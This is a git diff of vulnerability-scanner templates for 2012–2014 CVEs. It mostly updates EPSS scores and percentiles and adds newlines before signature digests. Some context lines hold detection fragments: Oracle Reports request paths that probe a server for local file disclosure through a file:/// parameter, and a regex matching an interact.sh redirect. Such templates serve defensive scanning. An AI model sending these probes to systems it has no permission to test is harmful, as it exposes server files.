epss-percentile: 0.99703 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml index aa779856d9..5f9c0ccb33 100644 --- a/http/cves/2012/CVE-2012-0394.yaml +++ b/http/cves/2012/CVE-2012-0394.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2012-0394 cwe-id: CWE-94 epss-score: 0.94515 - epss-percentile: 0.99027 + epss-percentile: 0.99029 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index db152b0a87..e6277e2af6 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2012-0901 cwe-id: CWE-79 epss-score: 0.00216 - epss-percentile: 0.59473 + epss-percentile: 0.59452 cpe: cpe:2.3:a:attenzione:yousaytoo:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022073007deefaf9d1075d6168a83ad1bf28c286a44395da65fd263186a828158dde02207c8e28f8aa199650f8318942ce3ee09db6c0d7a6ba43777f31c4631d9d09773f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022073007deefaf9d1075d6168a83ad1bf28c286a44395da65fd263186a828158dde02207c8e28f8aa199650f8318942ce3ee09db6c0d7a6ba43777f31c4631d9d09773f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml index 45f33e3897..d9d3534c09 100644 --- a/http/cves/2012/CVE-2012-0981.yaml +++ b/http/cves/2012/CVE-2012-0981.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-0981 cwe-id: CWE-22 epss-score: 0.02053 - epss-percentile: 0.87751 + epss-percentile: 0.87754 cpe: cpe:2.3:a:kybernetika:phpshowtime:2.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207e9f62248d59d2ba03c6f9cdd8d6ad9c702fa46201317c588d3efde4d504b3e4022100fdab83e60b06f7be4f5aff01dfbb9611a78275210ee4a24e9180c2be079b6def:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502207e9f62248d59d2ba03c6f9cdd8d6ad9c702fa46201317c588d3efde4d504b3e4022100fdab83e60b06f7be4f5aff01dfbb9611a78275210ee4a24e9180c2be079b6def:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index 5e5c7c9f07..7c810e1618 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-0991 cwe-id: CWE-22 epss-score: 0.81788 - epss-percentile: 0.98055 + epss-percentile: 0.98059 cpe: cpe:2.3:a:openemr:openemr:4.1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml index abf3173605..9357b51d94 100644 --- a/http/cves/2012/CVE-2012-0996.yaml +++ b/http/cves/2012/CVE-2012-0996.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2012-0996 cwe-id: CWE-22 epss-score: 0.00737 - epss-percentile: 0.78682 + epss-percentile: 0.78679 cpe: cpe:2.3:a:11in1:11in1:1.2.1:stable_12-31-2011:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200ff556f59ac2c48f09b5d7346380b4dad4aada7cdc2da0d12eb204f137437425022100c02322c8db3f6cd22bfe82b9dc24210154b5e30ca31510fd85a08b7ea89bccdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200ff556f59ac2c48f09b5d7346380b4dad4aada7cdc2da0d12eb204f137437425022100c02322c8db3f6cd22bfe82b9dc24210154b5e30ca31510fd85a08b7ea89bccdb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml index 164bc7c6ff..982efd02e2 100644 --- a/http/cves/2012/CVE-2012-1226.yaml +++ b/http/cves/2012/CVE-2012-1226.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-1226 cwe-id: CWE-22 epss-score: 0.10469 - epss-percentile: 0.94433 + epss-percentile: 0.94429 cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:3.2.0:alpha:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index 20e1d033bc..2e4dfba151 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-1835 cwe-id: CWE-79 epss-score: 0.00229 - epss-percentile: 0.60979 + epss-percentile: 0.60957 cpe: cpe:2.3:a:timely:all-in-one_event_calendar:1.4:*:*:*:*:*:*:* metadata: max-request: 1 @@ -51,4 +51,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fa5f9ef974d1b1e109141b85680ece1f73cd086bb81b9ad401d2c38bb2aca9c60220082aad1d6925343588b73b4deee12b908cdb6fb2b047265e4542183752627dfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100fa5f9ef974d1b1e109141b85680ece1f73cd086bb81b9ad401d2c38bb2aca9c60220082aad1d6925343588b73b4deee12b908cdb6fb2b047265e4542183752627dfc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index 6c4f1f322a..f65c4db251 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-2371 cwe-id: CWE-79 epss-score: 0.00825 - epss-percentile: 0.79989 + epss-percentile: 0.79974 cpe: cpe:2.3:a:mnt-tech:wp-facethumb:0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml index 5ce7ea934c..27a95a85b6 100644 --- a/http/cves/2012/CVE-2012-3153.yaml +++ b/http/cves/2012/CVE-2012-3153.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2012-3153 cwe-id: NVD-CWE-noinfo epss-score: 0.96555 - epss-percentile: 0.99501 + epss-percentile: 0.99502 cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:* metadata: max-request: 2 @@ -36,7 +36,6 @@ http: - "{{BaseURL}}/reports/rwservlet/showenv" - "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///" - matchers-condition: and matchers: - type: dsl @@ -63,4 +62,5 @@ http: name: linux_working_path regex: - "/.*/showenv" -# digest: 4a0a00473045022100bcae07c04c5fb862912d0ad54beb83e9d9942defb26322e776d9fe1470a4988502203e241e6643346e8fefe6d0dd810b3f0703a3ea7708120f93ac29a7038ff576a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100bcae07c04c5fb862912d0ad54beb83e9d9942defb26322e776d9fe1470a4988502203e241e6643346e8fefe6d0dd810b3f0703a3ea7708120f93ac29a7038ff576a7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4032.yaml b/http/cves/2012/CVE-2012-4032.yaml index 052269b5f4..05616f9da9 100644 --- a/http/cves/2012/CVE-2012-4032.yaml +++ b/http/cves/2012/CVE-2012-4032.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2012-4032 cwe-id: CWE-20 epss-score: 0.00951 - epss-percentile: 0.8143 + epss-percentile: 0.8141 cpe: cpe:2.3:a:websitepanel:websitepanel:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index ab3f2cbb2a..93ab9d046b 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2012-4242 cwe-id: CWE-79 epss-score: 0.00216 - epss-percentile: 0.59493 + epss-percentile: 0.59471 cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:0.9.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220208c6c060442288d563fada56f7625fa5e479fedeaa8e31f2077b8a7974e6c3c022100ee34638d91602ef900cf9c2fae6c5e76242060bbfe4e2cee74a892d3100a7140:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220208c6c060442288d563fada56f7625fa5e479fedeaa8e31f2077b8a7974e6c3c022100ee34638d91602ef900cf9c2fae6c5e76242060bbfe4e2cee74a892d3100a7140:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index 73d7360af7..793b421b0e 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-4253 cwe-id: CWE-22 epss-score: 0.02018 - epss-percentile: 0.87634 + epss-percentile: 0.87632 cpe: cpe:2.3:a:mysqldumper:mysqldumper:1.24.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index d39abe4f65..48443bf016 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-4273 cwe-id: CWE-79 epss-score: 0.00252 - epss-percentile: 0.62996 + epss-percentile: 0.62989 cpe: cpe:2.3:a:ppfeufer:2-click-social-media-buttons:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f2d93116b46c8ea16151c0e0edfb1d3abf9a1b0a0736a2ea4470343073bd2d32022100d92b3e4ae139650a627fdf7b6c8f8c727c324cf90fc7694f640cc6f7659aecc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100f2d93116b46c8ea16151c0e0edfb1d3abf9a1b0a0736a2ea4470343073bd2d32022100d92b3e4ae139650a627fdf7b6c8f8c727c324cf90fc7694f640cc6f7659aecc5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml index cdffa43d29..9f3b1a15a6 100644 --- a/http/cves/2012/CVE-2012-4547.yaml +++ b/http/cves/2012/CVE-2012-4547.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2012-4547 cwe-id: CWE-79 epss-score: 0.0023 - epss-percentile: 0.61105 + epss-percentile: 0.61082 cpe: cpe:2.3:a:laurent_destailleur:awstats:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e2ceba9aab6d3aace5ef2bc355d240959871baabfc3ae1f5274378d2d5621431022100d8ea789ff979f3c71cbbb909572f045a17fba1cda3b5bb4b3be6fb36a444b664:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e2ceba9aab6d3aace5ef2bc355d240959871baabfc3ae1f5274378d2d5621431022100d8ea789ff979f3c71cbbb909572f045a17fba1cda3b5bb4b3be6fb36a444b664:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index a5bbe98019..2649098b7f 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-4768 cwe-id: CWE-79 epss-score: 0.00922 - epss-percentile: 0.81136 + epss-percentile: 0.81121 cpe: cpe:2.3:a:mikejolley:download_monitor:3.3.5.7:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022053d7bac07aaac3ff48635aabb6b962ce82fbaf0f28f218018d451f88176446db022100c15c57cd48e785ec811b99a8be234872e6b7021effc8cb36ad20039592104cf3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022053d7bac07aaac3ff48635aabb6b962ce82fbaf0f28f218018d451f88176446db022100c15c57cd48e785ec811b99a8be234872e6b7021effc8cb36ad20039592104cf3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index e00bfe261a..e12ef04ff0 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-4878 cwe-id: CWE-22 epss-score: 0.00954 - epss-percentile: 0.81486 + epss-percentile: 0.81467 cpe: cpe:2.3:a:flatnux:flatnux:2011-08-09-2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml index 461e9544b3..2d4cbfe88e 100644 --- a/http/cves/2012/CVE-2012-4889.yaml +++ b/http/cves/2012/CVE-2012-4889.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-4889 cwe-id: CWE-79 epss-score: 0.03526 - epss-percentile: 0.9055 + epss-percentile: 0.90547 cpe: cpe:2.3:a:manageengine:firewall_analyzer:7.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml index 9b163da0dc..d4e25acdba 100644 --- a/http/cves/2012/CVE-2012-4940.yaml +++ b/http/cves/2012/CVE-2012-4940.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.4 cve-id: CVE-2012-4940 cwe-id: CWE-22 - epss-score: 0.04527 - epss-percentile: 0.91594 + epss-score: 0.14071 + epss-percentile: 0.95129 cpe: cpe:2.3:a:gecad:axigen_free_mail_server:-:*:*:*:*:*:*:* metadata: max-request: 2 @@ -40,4 +40,5 @@ http: - "fonts" - "extensions" condition: and -# digest: 490a0046304402206f4d408a62f24d3c4bdd81690f36c7cd4f0f2d3010a29f43ad8037e945c261340220517d35466c5823ffb5d3879566a314584f5608fc7f5ef7c18d6599937cf2160e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402206f4d408a62f24d3c4bdd81690f36c7cd4f0f2d3010a29f43ad8037e945c261340220517d35466c5823ffb5d3879566a314584f5608fc7f5ef7c18d6599937cf2160e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml index fa8b1dbfd3..513895927a 100644 --- a/http/cves/2012/CVE-2012-4982.yaml +++ b/http/cves/2012/CVE-2012-4982.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-4982 cwe-id: CWE-20 epss-score: 0.00763 - epss-percentile: 0.79088 + epss-percentile: 0.79082 cpe: cpe:2.3:a:forescout:counteract:6.3.4.10:*:*:*:*:*:*:* metadata: max-request: 1 @@ -37,4 +37,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a00483046022100b2f14d39e81b20d3d8a5f4b6ff8a99bedec347cfb47cc04c7b4248b6bcec8f60022100d5a61d70b7b168a506eaa6d228c37e75081c96a4527c3e049a55809102a9d82c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100b2f14d39e81b20d3d8a5f4b6ff8a99bedec347cfb47cc04c7b4248b6bcec8f60022100d5a61d70b7b168a506eaa6d228c37e75081c96a4527c3e049a55809102a9d82c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index 5bdc6c0624..17fb0b8e17 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2012-5913 cwe-id: CWE-79 epss-score: 0.01863 - epss-percentile: 0.87018 + epss-percentile: 0.87019 cpe: cpe:2.3:a:wordpress_integrator_project:wordpress_integrator:1.32:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml index c112f03964..091574bd0d 100644 --- a/http/cves/2012/CVE-2012-6499.yaml +++ b/http/cves/2012/CVE-2012-6499.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-6499 cwe-id: CWE-20 epss-score: 0.01204 - epss-percentile: 0.83643 + epss-percentile: 0.83627 cpe: cpe:2.3:a:age_verification_project:age_verification:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index 9f701ff60a..ff7c236e47 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2013-1965 cwe-id: CWE-94 epss-score: 0.00813 - epss-percentile: 0.79834 + epss-percentile: 0.79823 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml index f4ab11e869..0521be318f 100644 --- a/http/cves/2013/CVE-2013-2248.yaml +++ b/http/cves/2013/CVE-2013-2248.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2013-2248 cwe-id: CWE-20 epss-score: 0.97289 - epss-percentile: 0.99835 + epss-percentile: 0.99836 cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index 9f1f794aab..ae6b8955e9 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2013-2287 cwe-id: CWE-79 epss-score: 0.00219 - epss-percentile: 0.59795 + epss-percentile: 0.59773 cpe: cpe:2.3:a:roberta_bramski:uploader:1.0.4:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202ca140744340164d653a645789960dda4ec73a8fef1978f1ee062db49ea6cd45022100b9cdf023786170e4baf2077b0756249b61d3444945787e1defadab1e8db11b1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202ca140744340164d653a645789960dda4ec73a8fef1978f1ee062db49ea6cd45022100b9cdf023786170e4baf2077b0756249b61d3444945787e1defadab1e8db11b1d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-2621.yaml b/http/cves/2013/CVE-2013-2621.yaml index bbcb88e255..f76c398a67 100644 --- a/http/cves/2013/CVE-2013-2621.yaml +++ b/http/cves/2013/CVE-2013-2621.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2013-2621 cwe-id: CWE-601 epss-score: 0.03563 - epss-percentile: 0.90593 + epss-percentile: 0.9059 cpe: cpe:2.3:a:telaen_project:telaen:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index de6e98b23f..05ba149a83 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2013-3526 cwe-id: CWE-79 epss-score: 0.00519 - epss-percentile: 0.74134 + epss-percentile: 0.74128 cpe: cpe:2.3:a:wptrafficanalyzer:trafficanalyzer:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022074fea1c9ecdb7c6fdecedadeb2bc903295cb866a0eff4e3e37fe612df1ff008e022100dd41683963312fd9cc27fae296f30f329aa4a84294dc77e636835d0a04b9d030:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022074fea1c9ecdb7c6fdecedadeb2bc903295cb866a0eff4e3e37fe612df1ff008e022100dd41683963312fd9cc27fae296f30f329aa4a84294dc77e636835d0a04b9d030:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml index 73af0277a4..e6482b5584 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2013-3827 cwe-id: NVD-CWE-noinfo epss-score: 0.67719 - epss-percentile: 0.97633 + epss-percentile: 0.97637 cpe: cpe:2.3:a:oracle:fusion_middleware:2.1.1:*:*:*:*:*:*:* metadata: max-request: 10 diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index 6f66845914..70817213ab 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2013-4117 cwe-id: CWE-79 epss-score: 0.01217 - epss-percentile: 0.83736 + epss-percentile: 0.83721 cpe: cpe:2.3:a:anshul_sharma:category-grid-view-gallery:2.3.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022069fcb204894b8659b3fcdf78a11df89cbb1df2aefacb42f32ad81b0d176262a302203626b61b122982a5e88f818ef7969eeb73d9b423cb2a69dfa2a8990f3ef1de03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022069fcb204894b8659b3fcdf78a11df89cbb1df2aefacb42f32ad81b0d176262a302203626b61b122982a5e88f818ef7969eeb73d9b423cb2a69dfa2a8990f3ef1de03:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index 8cca4b7814..e8ac9d3245 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2013-4625 cwe-id: CWE-79 epss-score: 0.01217 - epss-percentile: 0.83736 + epss-percentile: 0.83721 cpe: cpe:2.3:a:cory_lamle:duplicator:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220416e137ae328c0428571fdc2f13556607c4b4de05ec72b94aa769f0118cab525022100b3d00e298ad50d3081676c2c24d896d3aa931ccc3714202693caeca0087e19ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220416e137ae328c0428571fdc2f13556607c4b4de05ec72b94aa769f0118cab525022100b3d00e298ad50d3081676c2c24d896d3aa931ccc3714202693caeca0087e19ca:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-5528.yaml b/http/cves/2013/CVE-2013-5528.yaml index c188333210..736a13ce5c 100644 --- a/http/cves/2013/CVE-2013-5528.yaml +++ b/http/cves/2013/CVE-2013-5528.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2013-5528 cwe-id: CWE-22 epss-score: 0.00565 - epss-percentile: 0.75238 + epss-percentile: 0.75227 cpe: cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220424333f05b15e2db8effe95defdcd4bf1c4d6a19d26d3ed42628e353c1ec043302200c01271582e271423899f3c3b0b9fb568706e90f46c5d6af0ff1dee6679461ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220424333f05b15e2db8effe95defdcd4bf1c4d6a19d26d3ed42628e353c1ec043302200c01271582e271423899f3c3b0b9fb568706e90f46c5d6af0ff1dee6679461ee:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index c58decf909..ed2799daa9 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2013-5979 cwe-id: CWE-22 epss-score: 0.06969 - epss-percentile: 0.93243 + epss-percentile: 0.93239 cpe: cpe:2.3:a:springsignage:xibo:1.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index e0b04be98b..9c463c70e1 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2013-6281 cwe-id: CWE-79 epss-score: 0.00209 - epss-percentile: 0.58759 + epss-percentile: 0.5874 cpe: cpe:2.3:a:dhtmlx:dhtmlxspreadsheet:2.0:-:*:*:*:wordpress:*:* metadata: verified: true @@ -53,4 +53,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402206825f34b5a23f842861c6f41f66d4f8e9293d66e73f4b43f71d37d1c7777157b02207453bcbea62d7bfe107372037fee20575f981c7c2896a1378f3e08e25107db07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402206825f34b5a23f842861c6f41f66d4f8e9293d66e73f4b43f71d37d1c7777157b02207453bcbea62d7bfe107372037fee20575f981c7c2896a1378f3e08e25107db07:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml index def213fb62..a57e9d1108 100644 --- a/http/cves/2013/CVE-2013-7240.yaml +++ b/http/cves/2013/CVE-2013-7240.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2013-7240 cwe-id: CWE-22 epss-score: 0.23987 - epss-percentile: 0.9613 + epss-percentile: 0.96126 cpe: cpe:2.3:a:westerndeal:advanced_dewplayer:1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-7285.yaml b/http/cves/2013/CVE-2013-7285.yaml index 582736ba60..7b2c161dce 100644 --- a/http/cves/2013/CVE-2013-7285.yaml +++ b/http/cves/2013/CVE-2013-7285.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2013-7285 cwe-id: CWE-78 epss-score: 0.52611 - epss-percentile: 0.97252 + epss-percentile: 0.97255 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-10037.yaml b/http/cves/2014/CVE-2014-10037.yaml index b478fab1f7..fec36d1874 100644 --- a/http/cves/2014/CVE-2014-10037.yaml +++ b/http/cves/2014/CVE-2014-10037.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-10037 cwe-id: CWE-22 epss-score: 0.14101 - epss-percentile: 0.95134 + epss-percentile: 0.95131 cpe: cpe:2.3:a:domphp:domphp:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402205e3b48255497bf54b5d4f59f02544a76b7f7564e5a39a136176a97b34902e59a02204d6d68173942a41069c94013b4ddbdecd03e3c3e77ec2c95d9c13cfd24610e77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402205e3b48255497bf54b5d4f59f02544a76b7f7564e5a39a136176a97b34902e59a02204d6d68173942a41069c94013b4ddbdecd03e3c3e77ec2c95d9c13cfd24610e77:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml index 7e9e92eb20..894c2f3d71 100644 --- a/http/cves/2014/CVE-2014-1203.yaml +++ b/http/cves/2014/CVE-2014-1203.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-1203 cwe-id: CWE-77 epss-score: 0.02045 - epss-percentile: 0.87724 + epss-percentile: 0.87728 cpe: cpe:2.3:a:eyou:eyou:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index 4d5f0727a3..b2e6742c7c 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-2383 cwe-id: CWE-200 epss-score: 0.00723 - epss-percentile: 0.78488 + epss-percentile: 0.78482 cpe: cpe:2.3:a:dompdf:dompdf:*:beta3:*:*:*:*:*:* metadata: verified: true @@ -62,4 +62,5 @@ http: - type: status status: - 200 -# digest: 